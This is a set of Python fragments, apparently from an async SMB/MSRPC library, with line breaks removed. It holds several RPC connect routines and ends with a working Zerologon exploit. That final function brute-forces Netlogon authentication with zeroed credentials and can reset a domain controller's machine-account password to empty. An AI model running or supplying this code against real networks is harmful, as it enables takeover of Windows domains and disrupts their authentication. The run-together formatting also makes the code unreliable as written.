async def connect(self, open=True): try: epm = EPM(self.connection, protocol='ncacn_ip_tcp') _, err = await epm.connect() if err is not None: return False, err stringBinding, _ = await rr(epm.map(even6.MSRPC_UUID_EVEN6)) self.dce = epm.get_connection_from_stringbinding(stringBinding) self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) _, err = await self.dce.connect() if err is not None: return False, err _, err = await self.dce.bind(even6.MSRPC_UUID_EVEN6) if err is not None: return False, err return True, None except Exception as e: return False, e finally: if epm is not None: await epm.disconnect()
async def connect(self, open=False): try: epm = EPM(self.connection, protocol='ncacn_ip_tcp') _, err = await epm.connect() if err is not None: raise err stringBinding, _ = await rr(epm.map(drsuapi.MSRPC_UUID_DRSUAPI)) self.dce = epm.get_connection_from_stringbinding(stringBinding) #the line below must be set! self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) _, err = await self.dce.connect() if err is not None: raise err if open == True: _, err = await self.open() if err is not None: raise err return True, None except Exception as e: return False, e finally: if epm is not None: await epm.disconnect()
async def filereader_test(connection_string, filename, proxy=None): cu = SMBConnectionURL(connection_string) smb_connection = cu.get_connection() epm = EPM(smb_connection, protocol='ncacn_ip_tcp') await rr(epm.connect()) data, exc = await epm.map(drsuapi.MSRPC_UUID_DRSUAPI) #data, exc = await epm.lookup() if exc is not None: raise exc print(data)
async def connect(self, open=False): epm = EPM(self.connection, protocol='ncacn_ip_tcp') await rr(epm.connect()) stringBinding, _ = await rr(epm.map(drsuapi.MSRPC_UUID_DRSUAPI)) self.dce = epm.get_connection_from_stringbinding(stringBinding) #the line below must be set! self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) await rr(self.dce.connect()) if open == True: await rr(self.open()) return True, None
async def run(dc_name, dc_ip, exploit=False): #exploit = True #dc_name = 'WIN2019AD' dc_handle = '\\\\' + dc_name #dc_ip = '10.10.10.2' target_computer = dc_name #without $ plaintext = b'\x00' * 8 ciphertext = b'\x00' * 8 # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled. flags = 0x212fffff url = SMBConnectionURL('smb2+ntlm-password://XXX\\aaa:aaa@%s' % dc_name) # dummy url to speed up the process.. connection = url.get_connection() async with connection: epm = EPM(connection, protocol='ncacn_ip_tcp') _, err = await epm.connect() if err is not None: raise err stringBinding, err = await epm.map(nrpc.MSRPC_UUID_NRPC) _, err = await epm.connect() if err is not None: raise err dce = epm.get_connection_from_stringbinding(stringBinding) #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) _, err = await dce.connect() if err is not None: raise err _, err = await dce.bind(nrpc.MSRPC_UUID_NRPC) if err is not None: raise err for _ in range(0, MAX_ATTEMPTS): print('=====================================================') _, err = await nrpc.hNetrServerReqChallenge( dce, dc_handle + '\x00', target_computer + '\x00', plaintext) if err is not None: raise err if exploit is False: server_auth, err = await nrpc.hNetrServerAuthenticate3( dce, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, target_computer + '\x00', ciphertext, flags) else: authenticator = nrpc.NETLOGON_AUTHENTICATOR() authenticator['Credential'] = b'\x00' * 8 authenticator['Timestamp'] = 0 server_auth, err = await nrpc.hNetrServerPasswordSet2( dce, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, target_computer + '\x00', authenticator, b'\x00' * 516) if err is not None: if err.get_error_code() == 0xc0000022: continue else: raise err if server_auth['ErrorCode'] == 0: print('Server is vulnerable!') break else: print('FAILED!') await dce.disconnect()